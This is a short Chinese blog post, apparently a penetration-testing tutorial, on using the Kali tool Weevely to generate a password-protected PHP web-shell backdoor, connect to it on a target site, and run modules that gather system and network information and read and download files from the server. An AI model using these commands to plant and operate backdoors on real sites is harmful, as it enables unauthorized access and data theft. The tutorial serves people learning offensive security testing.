工具weevely使用

Weevely介绍
Weevely工具Python语言编写,集生成木马与加连接于一身,相当于Linux中的中国菜刀,但只适用于php网站,已经加入Kali豪华大礼包中。在Kali1.0中集成的低版本V1.1更是功能强大,支持图片与.htaccess两种绕过方式。新版本中将这两种功能阉割掉了,但是生成的木马文件仍然进行了加密处理。
环境说明
Kali版本:Kali Linux 2.0
工具版本:Weevely 3.7.0
测试系统:Server2008R2+phpstudy+IIS
生成后门
weevely generate [] filename
▲password为生成后门的密码,path为生成路径,如果未填写为当前目录中,filename在帮助文件中未标注,这个在生成时也是需要写的
weevely generate 123456 data.php

连接后门
weevely http://..//..//..//.data.php 123456

目标地址url 密码

▲在使用中URl部分需要加上http://或https://
建立连接后常用命令
-audit.phpconf【查看php相关信息】

-system_info【查看系统信息】

▲Server系统也可直接使用系统命令systeminfo
-net_ifconfig【获取网卡信息】
--PS:ifconfig主要是针对Linux操作系统,要灵活应用。如果是Win系统可以直接使用ipconfig查看。

-file_ls【列出目录中内容】

-file_read【读取文件信息】

-file_download【下载目标站点文件】

posted on 2020-08-20 14:33  TaoTao大魔王  阅读(364)  评论(0编辑  收藏  举报